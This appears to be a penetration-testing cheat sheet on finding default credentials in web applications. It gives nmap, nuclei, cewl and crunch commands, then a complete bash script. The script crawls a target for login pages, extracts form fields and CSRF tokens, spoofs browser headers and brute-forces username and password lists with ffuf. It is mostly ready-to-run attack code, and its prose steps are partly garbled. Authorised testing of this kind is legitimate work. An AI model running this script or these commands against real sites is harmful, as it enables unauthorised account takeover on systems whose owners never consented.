Default Credentials
Check List
Methodology
Black Box
Default Credentials
1
For the first step, we can view default usernames and passwords in the list of these lists using Github repositories
2
Then, using the next command related to the Nmap tool and related to the switch, we execute this vulnerability on the target and identify the existence of this vulnerability
3
And by using the next commands that are related to the tools, we can execute on the target and the existence of this damage Identify the vulnerability on the target if there is a Default Credentials vulnerability on the login page or not
4
And then we can automatically find the authentication form on the site using the written script, and then it finds the username and password forms, and it can brute force a list of password lists and default usernames using the FFUF tool
White Box
Cheat Sheet
Vendor Default Credentials
Default Creds
sudo nmap -p80,443 --mtu 5000 --script http-default-accounts $WEBSITEOrganization Default Passwords
creds search $VENDORnuclei -u $WEBSITE -tags default-loginApplication Generated Default Passwords
cewl $WEBSITE --header "Cookie: $COOKIE" -d 5 -m 4crunch 8 12 -t @@company%% -o /tmp/passlist.txtsudo nano default-bruteforce.sh#!/bin/bash
# Config
USERLIST="/usr/share/seclists/Usernames/top-usernames-shortlist.txt"
PASSLIST="/usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt"
# Input Check
if [ $# -lt 1 ]; then
echo "Usage: $0 <domain.com>"
exit 1
fi
URL="$1"
# Find Login Page
LOGIN=$(katana -u "$URL" -depth 3 -silent | \
grep -iE "/(login|signin|sign-in|auth|user/login|admin/login|my-account|account|wp-login\.php)(/)?$" | \
grep -viE "lost-password|reset|forgot|register|signup|signout|logout|\.(js|css|jpg|png|gif|svg|ico)$" | \
sed 's:[/?]*$::' | sed 's:$:/:')
if [ -z "$LOGIN" ]; then
echo "[!] No login page found. Exiting."
exit 1
fi
# Fetch HTML
HTML=$(curl -s "$LOGIN")
FORM=$(echo "$HTML" | sed -n '/<form/,/<\/form>/p' | head -n 100)
# CAPTCHA / reCAPTCHA Check
CAPTCHA_KEYWORDS="g-recaptcha|recaptcha|h-captcha|data-sitekey|captcha|grecaptcha.execute|hcaptcha.execute"
if echo "$HTML" | grep -qiE "$CAPTCHA_KEYWORDS"; then
echo "[!] CAPTCHA detected on login page. Brute-force aborted."
exit 1
fi
# Extract Form Action and Method
ACTION=$(echo "$FORM" | grep -oEi 'action="[^"]*"' | head -1 | cut -d'"' -f2)
[ -z "$ACTION" ] && ACTION="$LOGIN"
METHOD=$(echo "$FORM" | grep -oEi 'method="[^"]+"' | head -1 | cut -d'"' -f2 | tr '[:upper:]' '[:lower:]')
[ -z "$METHOD" ] && METHOD="post"
if [[ "$ACTION" == /* ]]; then
BASE_URL=$(echo "$URL" | sed 's|^\(https\?://[^/]*\).*|\1|')
FULL_ACTION="${BASE_URL}${ACTION}"
elif [[ "$ACTION" =~ ^https?:// ]]; then
FULL_ACTION="$ACTION"
else
BASE_URL=$(echo "$LOGIN" | sed 's|\(https\?://.*/\).*|\1|')
FULL_ACTION="${BASE_URL}${ACTION}"
fi
# Extract Username & Password Ffiles
USERNAME_FIELD=$(echo "$FORM" | grep -oEi '<input[^>]*name="[^"]+"' | \
grep -Ei 'user(name)?|login(_id)?|userid|uname|mail|email|auth_user' | head -1 | sed -E 's/.*name="([^"]+)".*/\1/')
PASSWORD_FIELD=$(echo "$FORM" | grep -oEi '<input[^>]*name="[^"]+"' | \
grep -Ei 'pass(word)?|passwd|pwd|auth_pass|login_pass' | head -1 | sed -E 's/.*name="([^"]+)".*/\1/')
[ -z "$USERNAME_FIELD" ] && USERNAME_FIELD="username"
[ -z "$PASSWORD_FIELD" ] && PASSWORD_FIELD="password"
# CSRF Token Extration
CSRF_FIELD=""
CSRF_VALUE=""
HIDDEN_INPUTS=$(echo "$FORM" | grep -oiP '<input[^>]+type=["'\'']?hidden["'\'']?[^>]*>')
while read -r INPUT; do
NAME=$(echo "$INPUT" | grep -oiP 'name=["'\'']?\K[^"'\'' ]+')
VALUE=$(echo "$INPUT" | grep -oiP 'value=["'\'']?\K[^"'\'' ]+')
if [[ "$NAME" =~ csrf|token|nonce|authenticity|verification ]]; then
CSRF_FIELD="$NAME"
CSRF_VALUE="$VALUE"
break
fi
done <<< "$HIDDEN_INPUTS"
if [ -z "$CSRF_FIELD" ] && [ -n "$HIDDEN_INPUTS" ]; then
CSRF_FIELD=$(echo "$HIDDEN_INPUTS" | grep -oiP 'name=["'\'']?\K[^"'\'' ]+' | head -1)
CSRF_VALUE=$(echo "$HIDDEN_INPUTS" | grep -oiP 'value=["'\'']?\K[^"'\'' ]+' | head -1)
fi
# Prepre POST Data
DATA="${USERNAME_FIELD}=FUZZ1&${PASSWORD_FIELD}=FUZZ2"
[ -n "$CSRF_FIELD" ] && [ -n "$CSRF_VALUE" ] && DATA="${CSRF_FIELD}=${CSRF_VALUE}&${DATA}"
# Extract Cookies
COOKIES=$(curl -s -I "$URL" \
| grep -i '^Set-Cookie:' \
| sed -E 's/^Set-Cookie: //I' \
| cut -d';' -f1 \
| grep -i 'PHPSESSID')
# Extract only domain and port
HOST=$(echo "$URL" | sed -E 's~^https?://([^/]+).*~\1~')
# Headers
HEADERS=(
-H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:142.0) Gecko/20100101 Firefox/142.0"
-H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
-H "Accept-Language: en-US,fa-IR;q=0.5"
-H "Accept-Encoding: gzip, deflate"
-H "Content-Type: application/x-www-form-urlencoded"
-H "Origin: $URL"
-H "Sec-GPC: 1"
-H "Connection: keep-alive"
-H "Referer: $LOGIN"
-H "Cookie: $COOKIES"
-H "Upgrade-Insecure-Requests: 1"
-H "Priority: u=0, i"
)
# Run FFUF
if [[ "$METHOD" == "get" ]]; then
FFUF_URL="${FULL_ACTION}?${DATA}"
ffuf -u "$FFUF_URL" \
-w "$USERLIST:FUZZ1" \
-w "$PASSLIST:FUZZ2" \
-X GET \
-ac -c -r \
-mc 200 \
"${HEADERS[@]}"
else
ffuf -u "$FULL_ACTION" \
-w "$USERLIST:FUZZ1" \
-w "$PASSLIST:FUZZ2" \
-X POST \
-d "$DATA" \
-ac -c -r \
-mc 200 \
"${HEADERS[@]}"
fisudo chmod +x default-bruteforce.sh;sudo ./default-bruteforce.sh $WEBSITELast updated